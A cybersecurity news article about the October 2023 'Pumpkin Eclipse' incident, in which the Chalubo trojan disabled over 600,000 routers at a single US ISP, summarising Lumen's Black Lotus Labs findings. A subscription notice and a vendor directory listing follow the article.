A Single Attack Disabled Half A Million Routers

In October 2023 unknown hackers attacked a US telecommunications company and  disabled hundreds of thousands of Internet routers, according to research now released by Lumen Technologies. More than 600,000 small office/home office (SOHO) routers are estimated to have been rendered useless and taken offline, following a destructive cyber attack which disrupted user access to the Internet.

This unexplained event whch took place between October 25 and 27, 2023, and impacted a single Internet service provider (ISP) in the US, has been codenamed Pumpkin Eclipse by the Lumen's Black Lotus Labs research team. 

This attack specifically affected three router models issued by the ISP: ActionTec T3200, ActionTec T3260, and Sagemcom. "The incident took place over a 72-hour period between October 25-27, rendered the infected devices permanently inoperable, and required a hardware-based replacement," says the Lumen report.

The blackout is significant, not least because it led to the abrupt removal of 49% of all modems from the impacted ISP's autonomous system number (ASN) during the time-frame.

While the name of the ISP is not disclosed, reports at the time suggested it was Windstream Communications, which suffered an outage around the same time, causing users to report a "steady red light" being displayed by the impacted modems.

Recently Lumen's analysis revealed a commodity remote access trojan (RAT) called Chalubo, a stealthy malware first detected by Sophos in October 2018, as responsible for the sabotage, with the adversary opting for it presumably in an effort to complicate attribution efforts rather than use a custom toolkit. "Chalubo has payloads designed for all major SOHO/IoT kernels, pre-built functionality to perform DDoS attacks, and can execute any Lua script sent to the bot," the company said. 

The exact initial access method used to breach the routers is currently unclear, although it is suggested  that it may have involved the abuse of weak credentials or exploited an exposed administrative interface. 

On gaining a successful foothold, the infection chain proceeds to drop shell scripts that pave the way for a loader ultimately designed to retrieve and launch Chalubo from an external server. The destructive Lua script module fetched by the trojan is unknown.

A notable aspect of the campaign is its targeting of a single ASN, as opposed to others that have typically targeted a specific router model or common vulnerability, raising the possibility that it was deliberately targeted, although the motivations behind it are undetermined as yet. "The event was unprecedented due to the number of units affected, no attack that we can recall has required the replacement of over 600,000 devices," Lumen said. 

Lumen   |    Reddit    |    Reuters    |   Hacker News   |   DSL Reports

Image: Unsplash

You Might Also Read: 

Cyber Security Regulations For Smart Devices:

___________________________________________________________________________________________

If you like this website and use the comprehensive 7,000-plus service supplier Directory, you can get unrestricted access, including the exclusive in-depth Directors Report series, by signing up for a Premium Subscription.

  • Individual £5 per month or £50 per year. Sign Up
  • Multi-User, Corporate & Library Accounts Available on Request

Cyber Security Intelligence: Captured Organised & Accessible


 

« Shiny Hunters Attack Santander Bank
Hamlet’s IP & AI »

CyberSecurity Jobsite
Perimeter 81

Directory of Suppliers

LockLizard

LockLizard

Locklizard provides PDF DRM software that protects PDF documents from unauthorized access and misuse. Share and sell documents securely - prevent document leakage, sharing and piracy.

CSI Consulting Services

CSI Consulting Services

Get Advice From The Experts: * Training * Penetration Testing * Data Governance * GDPR Compliance. Connecting you to the best in the business.

NordLayer

NordLayer

NordLayer is an adaptive network access security solution for modern businesses — from the world’s most trusted cybersecurity brand, Nord Security. 

XYPRO Technology

XYPRO Technology

XYPRO is the market leader in HPE Non-Stop Security, Risk Management and Compliance.

Alvacomm

Alvacomm

Alvacomm offers holistic VIP cybersecurity services, providing comprehensive protection against cyber threats. Our solutions include risk assessment, threat detection, incident response.

Duane Morris LLP

Duane Morris LLP

Duane Morris is a global law firm with offices in the USA, UK and Asia. Practice areas include Cybersecurity.

OPSWAT

OPSWAT

OPSWAT is a software company that provides solutions to secure and manage IT infrastructure.

IS Decisions

IS Decisions

IS Decisions builds affordable and easy-to-use Access Management software solutions, allowing IT teams to effectively secure access to Active Directory infrastructures, SaaS apps and data within.

CONCERT

CONCERT

CONCERT is a Computer Emergency Response Team and cyber security information sharing network for companies, institutes and government in Korea.

NetGuardians

NetGuardians

NetGuardians is a leading Fintech company recognized for its unique approach to fraud and risk assurance solutions.

VU Security

VU Security

VU is a specialist in Cybersecurity software development with a focus on the prevention of fraud and identity theft.

Gospel Technology

Gospel Technology

Gospel presents a totally new way of accessing and controlling data which is enterprise grade scalable, highly resilient, and secure.

NSO Group

NSO Group

NSO Group develops technology that enables government intelligence and law enforcement agencies to prevent and investigate terrorism and crime.

Cynterra

Cynterra

Cynterra is a next generation cloud cyber security and data analytical service provider offering cloud security compliance, data protection, visibility and threat protection services.

Symantec

Symantec

Symantec delivers data-centric hybrid security for the largest, most complex organizations in the world – on devices, in private data centers, and in the cloud.

HackControl

HackControl

HackControl services include penetration tests, security audits, block chain audits and brand and anti-phishing protection.

Truvantis

Truvantis

Truvantis is a cybersecurity consulting organization providing best-in-class cybersecurity services to secure your organization’s infrastructure, data, operations and products.

FluidOne

FluidOne

FluidOne are an award-winning Connected Cloud Solutions provider. We design tailored solutions to help customers and partners digitally transform their IT and communications.

Cydea

Cydea

Cydea are an optimistic cyber security consultancy of experts in security, data, technology and design that want to build a safer, more secure world where more things go right.

Btech

Btech

Btech is the market leader in providing affordable managed IT security services for credit unions.

Beazley Security

Beazley Security

Beazley Security is a global cyber security firm committed to helping clients develop true cyber resilience: the ability to withstand and recover from any cyberattack.